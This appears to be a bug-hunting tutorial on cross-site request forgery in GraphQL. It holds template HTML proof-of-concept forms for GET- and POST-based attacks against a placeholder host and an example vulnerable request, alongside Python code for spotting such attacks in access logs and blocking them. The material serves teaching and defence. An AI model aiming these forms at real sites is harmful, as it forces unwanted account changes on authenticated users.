😋CSRF

CSRF (Cross-Site Request Forgery) is a vulnerability that occurs when a malicious web application causes the victim's browser to perform an unwanted action on behalf of an authenticated user. In other words, by exploiting CSRF an attacker can force an authenticated user to perform an action they never intended to.

Unwanted tasks like:

  1. updating the user's password

  2. updating the user's email

CSRF attacks generally happen when authentication is based only on a cookie and not on any other header, because the browser attaches cookies to cross-site requests automatically, while a custom header has to be added by the page's own script.

Try PortSwigger's labs for more on CSRF.

Csrf In Graphql

CSRF in GraphQL follows the same concept: users are forced to perform actions they did not intend to.

Let's categorize CSRF for better understanding:

  1. GET-based CSRF

  2. POST-based CSRF

1. GET-based CSRF 😄

Let's understand the whole process step by step:

  • GraphQL servers often allow both query and mutation operations through GET requests.

  • This can be abused if the web application uses cookie-based authentication.

  • The attacker then crafts a payload (a URL or form) that changes the user's details.

  • Finally, the attacker sends the crafted payload to the authenticated user.

Detect whether the target is vulnerable to GET-based CSRF by using: stainql

This tool will not always give the correct answer, so do check manually (it is still under development).

Command for checking both types of CSRF:

python3 graphql.py -t https://graphql-example.com/graphql -c

[screenshot: tool for detecting csrf]

For manually checking for GET-based CSRF, refer to this article by Assetnote:

assetnote

POC code for GET-based CSRF:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://graphql-example.com/graphql">
      <input type="hidden" name="query" value="<value of query>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
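From the defender's side, a GET-based CSRF attempt like the POC above leaves a clear trace in the web server's access log: a GET request to the GraphQL path whose query parameter is a mutation, usually with a foreign or missing Referer. The following script is an added example (not part of this page, stainql, or any GraphQL project) that scans combined-format access log lines for exactly that pattern; the log lines, IP addresses, site origin and referer URLs are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Combined log format (the Apache/nginx default style).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines for a site at https://graphql-example.com (not real traffic).
SAMPLE_LOG = '''
203.0.113.5 - - [10/Mar/2024:12:00:01 +0000] "GET /graphql?query=%7B%20viewer%20%7B%20email%20%7D%20%7D HTTP/1.1" 200 120 "https://graphql-example.com/app" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2024:12:00:07 +0000] "GET /graphql?query=mutation%20%7B%20updateEmail(email%3A%20%22new%40example.net%22)%20%7B%20ok%20%7D%20%7D HTTP/1.1" 200 45 "https://poc.example/csrf.html" "Mozilla/5.0"
203.0.113.9 - - [10/Mar/2024:12:00:09 +0000] "POST /graphql HTTP/1.1" 200 310 "https://graphql-example.com/app" "Mozilla/5.0"
198.51.100.2 - - [10/Mar/2024:12:00:11 +0000] "GET /graphql?query=%20%20mutation%20changePassword%20%7B%20setPassword(new%3A%20%22x%22)%20%7B%20ok%20%7D%20%7D HTTP/1.1" 200 45 "-" "Mozilla/5.0"
'''


def graphql_operation_type(document: str) -> str:
    """Return 'query', 'mutation' or 'subscription' for a GraphQL document.

    Leading whitespace and '#' comments are skipped; the bare '{ ... }'
    shorthand is an anonymous query.
    """
    text = re.sub(r'#[^\n]*', '', document).lstrip()
    m = re.match(r'(query|mutation|subscription)\b', text)
    return m.group(1) if m else 'query'


def parse_log_line(line: str):
    """Split one combined-format line into its fields, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def origin_of(url: str) -> str:
    """'https://host/path?x' -> 'https://host'; '' for a missing ('-') referer."""
    if not url or url == '-':
        return ''
    p = urlsplit(url)
    return f'{p.scheme}://{p.netloc}'


def find_get_mutations(log_text: str, site_origin: str, path: str = '/graphql'):
    """Return one finding per GET request to `path` whose `query` parameter is a mutation."""
    findings = []
    for raw in log_text.splitlines():
        rec = parse_log_line(raw.strip())
        if not rec or rec['method'] != 'GET':
            continue
        target = urlsplit(rec['target'])
        if target.path != path:
            continue
        # parse_qs percent-decodes the value, giving back the GraphQL document.
        document = parse_qs(target.query).get('query', [''])[0]
        if graphql_operation_type(document) != 'mutation':
            continue
        findings.append({
            'ip': rec['ip'],
            'time': rec['time'],
            'referer': rec['referer'],
            # A missing Referer cannot prove same-origin, so it is flagged as well.
            'cross_origin': origin_of(rec['referer']) != site_origin,
            'document': document,
        })
    return findings


if __name__ == '__main__':
    for f in find_get_mutations(SAMPLE_LOG, 'https://graphql-example.com'):
        flag = 'CROSS-ORIGIN' if f['cross_origin'] else 'same-origin'
        print(f"{f['time']} {f['ip']} {flag} referer={f['referer']} -> {f['document']}")
```

On the constructed sample the first line (a read-only query) and the POST line are ignored, while the two GET mutations are reported, one with a foreign Referer and one with none. Referer is a weak signal because browsers and privacy extensions may strip it, so the mutation-over-GET condition is the primary indicator and the origin check only adds context.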

Bug reports on GET-based CSRF:

hackerone
huntr_ai
Gitlab

2. POST-based CSRF 😄

Again the concept is the same, but POST-based CSRF is found more often than GET-based.

Detecting POST-based CSRF:

If the server accepts application/x-www-form-urlencoded as the Content-Type, it can be vulnerable to POST-based CSRF, because an HTML form on any origin can submit that content type and the browser attaches the victim's cookies. If the server only accepts application/json, it is not vulnerable to this form-based CSRF: a plain HTML form cannot send application/json, and a cross-origin fetch/XHR that sets it triggers a CORS preflight that the server can refuse. Make sure the server really enforces the content type rather than parsing the body regardless of the header, and check the other form-submittable types (multipart/form-data, text/plain) as well.

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://graphql-example.com/graphql" method="POST">
      <input type="hidden" name="query" value="<html encoded value of query parameter>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Example of a vulnerable request:

POST /graphql HTTP/1.1
Host: graphql-example.com
Connection: close
Content-Length: 100
accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Referer: https://graphql-example.com
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Cookie: ...

query=query+%7B+dummyQuery+%7D

Vulnerable response (the error comes from the GraphQL engine, which shows that the form-encoded body was parsed and executed as a GraphQL document; a cross-site form submission would be processed the same way):

{
  "errors": [
    {
      "message": "Cannot query field \"dummyQuery\" on type \"Query\".",
      "locations": [{"line": 1, "column": 9}]
    }
  ]
}

Prevention of CSRF Vulnerability

  • Only accept application/json for POST-based requests; don't allow any other content type (and don't execute mutations over GET).

  • Use a secure token exchange: an anti-CSRF token that the client must send in a header and that the server validates against the session.
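The content-type rule from the detection section and the two prevention bullets above can be enforced in one request guard in front of the GraphQL executor. The code below is an added example, not this page's code and not the API of any particular GraphQL server: a framework-independent check that rejects mutations over GET, rejects any POST whose media type is not application/json, and requires a synchronizer token in an X-CSRF-Token header that matches the token stored in the session. The header name, the function names and the sample requests are assumptions made for the example.

```python
import hmac
import re
import secrets

ALLOWED_MEDIA_TYPE = 'application/json'


def issue_csrf_token() -> str:
    """Create a fresh anti-CSRF token to store in the user's session (synchronizer token)."""
    return secrets.token_urlsafe(32)


def media_type(content_type) -> str:
    """Reduce 'application/json; charset=utf-8' to 'application/json'."""
    if not content_type:
        return ''
    return content_type.split(';', 1)[0].strip().lower()


def graphql_operation_type(document: str) -> str:
    """'query', 'mutation' or 'subscription'; the bare '{ ... }' shorthand is a query."""
    text = re.sub(r'#[^\n]*', '', document).lstrip()
    m = re.match(r'(query|mutation|subscription)\b', text)
    return m.group(1) if m else 'query'


def check_graphql_request(method: str, headers: dict, document: str, session_csrf_token=None):
    """Decide whether a GraphQL HTTP request may be executed.

    Returns (allowed, reason). `headers` are matched case-insensitively;
    `session_csrf_token` is the token the server stored in the caller's session.
    """
    h = {k.lower(): v for k, v in headers.items()}
    op = graphql_operation_type(document)

    if method == 'GET':
        # GET is reachable from a cross-site <img>, <a> or <form>, so it may only read.
        if op != 'query':
            return False, f'{op} operations are only accepted over POST'
        return True, 'read-only query over GET'

    if method != 'POST':
        return False, 'method not allowed'

    # An HTML form can only send urlencoded, multipart or text/plain bodies;
    # sending application/json cross-origin forces a CORS preflight instead.
    if media_type(h.get('content-type')) != ALLOWED_MEDIA_TYPE:
        return False, 'content-type must be application/json'

    # Synchronizer token: the page's script copies the session token into a header.
    # Constant-time comparison on bytes avoids leaking the token through timing.
    token = h.get('x-csrf-token', '')
    if not session_csrf_token or not hmac.compare_digest(
        token.encode('utf-8'), session_csrf_token.encode('utf-8')
    ):
        return False, 'missing or invalid CSRF token'

    return True, 'ok'


if __name__ == '__main__':
    session_token = issue_csrf_token()
    # The form-encoded request from the vulnerable example above (cookie value is a placeholder).
    print(check_graphql_request(
        'POST',
        {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'session=...'},
        'query { dummyQuery }', session_token))
    # A GET-based attempt carrying a mutation.
    print(check_graphql_request(
        'GET', {}, 'mutation { updateEmail(email: "x@example.net") { ok } }', session_token))
    # The legitimate front end: JSON body plus the session's token in a header.
    print(check_graphql_request(
        'POST',
        {'Content-Type': 'application/json; charset=utf-8', 'X-CSRF-Token': session_token},
        'mutation { updateEmail(email: "x@example.net") { ok } }', session_token))
```

The header requirement alone already defeats a cross-site form, because a form cannot set custom headers; the content-type check is defence in depth for the case where the token handling has a gap. Allowing read-only queries over GET is only safe if the query resolvers genuinely have no side effects; if that cannot be guaranteed, make the GET branch return False as well.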

more about prevention.
